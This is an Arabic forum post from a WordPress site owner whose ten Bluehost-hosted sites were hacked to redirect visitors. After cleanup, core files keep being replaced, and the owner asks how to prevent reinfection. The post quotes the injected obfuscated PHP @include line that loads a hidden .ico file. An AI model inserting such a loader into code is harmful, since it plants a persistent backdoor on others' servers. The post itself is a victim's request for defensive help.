سلامات جميعاً
انا استخدم ووردبريس على استضافة بلوهوست وقمت بربط 10 دومينات على هذا الحساب، من فترة اكتشفت عملية اختراق تقوم بتحويل روابط المواقع الى مواقع متعددة.
قمت بتحديث جميع الاضافات البرمجية وحذف الاكواد الموجودة ضمن الملفات، لكن بعد عدة ايام عند المراجعة وجدت انه تم استبدال العديد من الملفات بملفات اخرى فيها الكود التالي:
/*dc84b*/
@include "\057h\157m\*********\143/\160u\142l\151c\137h\164m\154/\167p\055i\156c\154u\144e\163/\122e\161u\145s\164s\057.\067e\0700\1418\062b\056i\143o";
/*dc84b*/
الملفات المستبدلة:
index.php
wp-config.php
wp-settings.php
بعد فك التشفير وجد ملف بعنوان .7e80a82b.ico لم استطيع فك التشفير حتى اتمكن من مشاهدة محتوياته.
سؤالي هو كيف اقوم بمنع حدوث هذا الأمر مرة اخرى ارجو منكم المساعدة مع العلم انه يوجد على الاستضافة اكتر من 10 نسخ ووردبريس منصبة ويتم العمل عليها.
الصورة المرفقة لمحتوى ملف .7e80a82b.ico